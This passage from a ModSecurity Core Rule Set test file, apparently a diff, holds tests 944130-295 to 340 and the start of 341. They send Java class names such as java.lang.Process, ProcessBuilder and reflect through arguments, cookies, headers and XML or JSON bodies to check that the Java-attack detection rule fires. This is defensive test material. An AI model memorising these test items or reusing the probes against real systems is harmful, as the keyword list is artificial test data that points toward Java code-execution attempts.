Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-295 + desc: "Content-Type application/json arg value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-296 + desc: "Content-Type application/json arg name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-297 + desc: "Argument test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-298 + desc: "Argument name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-299 + desc: "Cookie test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-300 + desc: "Cookie name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-301 + desc: "Request header test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-302 + desc: "XML attribute value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-303 + desc: "XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-304 + desc: "Nested XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-305 + desc: "Content-Type text/plain includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-306 + desc: "Content-Type application/json arg value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-307 + desc: "Content-Type application/json arg name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-308 + desc: "Argument test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-309 + desc: "Argument name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-310 + desc: "Cookie test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-311 + desc: "Cookie name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-312 + desc: "Request header test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-313 + desc: "XML attribute value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-314 + desc: "XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-315 + desc: "Nested XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-316 + desc: "Content-Type text/plain includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-317 + desc: "Content-Type application/json arg value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-318 + desc: "Content-Type application/json arg name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-319 + desc: "Argument test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-320 + desc: "Argument name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-321 + desc: "Cookie test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-322 + desc: "Cookie name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-323 + desc: "Request header test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-324 + desc: "XML attribute value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-325 + desc: "XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-326 + desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-327 + desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-328 + desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-329 + desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-330 + desc: "Argument test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-331 + desc: "Argument name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-332 + desc: "Cookie test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-333 + desc: "Cookie name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-334 + desc: "Request header test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-335 + desc: "XML attribute value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-336 + desc: "XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-337 + desc: "Nested XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-338 + desc: "Content-Type text/plain includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-339 + desc: "Content-Type application/json arg value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-340 + desc: "Content-Type application/json arg name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-341 + desc: "Argument test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 